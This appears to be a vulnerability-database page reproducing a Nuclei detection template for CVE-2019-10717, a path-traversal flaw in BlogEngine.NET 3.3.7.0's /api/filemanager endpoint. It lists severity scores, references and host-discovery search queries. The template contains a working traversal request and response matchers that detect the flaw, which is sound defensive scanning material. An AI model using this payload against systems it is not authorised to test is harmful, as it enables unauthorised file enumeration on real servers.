Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-10717
HistoryAug 01, 2022 - 7:58 a.m.

BlogEngine.NET 3.3.7.0 - Local File Inclusion

2022-08-0107:58:09
ProjectDiscovery
github.com
7
cve2019
seclists
blogengine
lfi
traversal
dotnetblogengine
filemanager

CVSS2

5.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:P/A:N

CVSS3

7.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N

AI Score

6.8

Confidence

High

EPSS

0.005

Percentile

76.0%

BlogEngine.NET 3.3.7.0 allows /api/filemanager local file inclusion via the path parameter
id: CVE-2019-10717

info:
  name: BlogEngine.NET 3.3.7.0 - Local File Inclusion
  author: arafatansari
  severity: high
  description: |
    BlogEngine.NET 3.3.7.0 allows /api/filemanager local file inclusion via the path parameter
  impact: |
    An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks.
  remediation: |
    Upgrade to a patched version of BlogEngine.NET or apply the vendor-supplied patch to mitigate this vulnerability.
  reference:
    - https://www.securitymetrics.com/blog/Blogenginenet-Directory-Traversal-Listing-Login-Page-Unvalidated-Redirect
    - https://github.com/rxtur/BlogEngine.NET/commits/master
    - https://nvd.nist.gov/vuln/detail/CVE-2019-10717
    - http://seclists.org/fulldisclosure/2019/Jun/44
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
    cvss-score: 7.1
    cve-id: CVE-2019-10717
    cwe-id: CWE-22
    epss-score: 0.00351
    epss-percentile: 0.71813
    cpe: cpe:2.3:a:dotnetblogengine:blogengine.net:3.3.7.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: dotnetblogengine
    product: blogengine.net
    shodan-query:
      - http.html:"Blogengine.net"
      - http.html:"blogengine.net"
    fofa-query: body="blogengine.net"
  tags: cve,cve2019,seclists,blogengine,lfi,traversal,dotnetblogengine

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/filemanager?path=%2F..%2f..%2fContent"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "application/json"

      - type: regex
        regex:
          - '~/App_Data/files/../../([a-zA-Z0-9\.\-]+)/([a-z0-9]+)'

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210086bd22735af01bfd411ee905481a3dc6f43f7656c98464c581d7197355312719022100a746f75f698fb3b2dd2130fbfc5d001012bc61a5f8946d5e2c8b2e80abff19fc:922c64590222798bb761d5b6d8e72950

CVSS2

5.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:P/A:N

CVSS3

7.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N

AI Score

6.8

Confidence

High

EPSS

0.005

Percentile

76.0%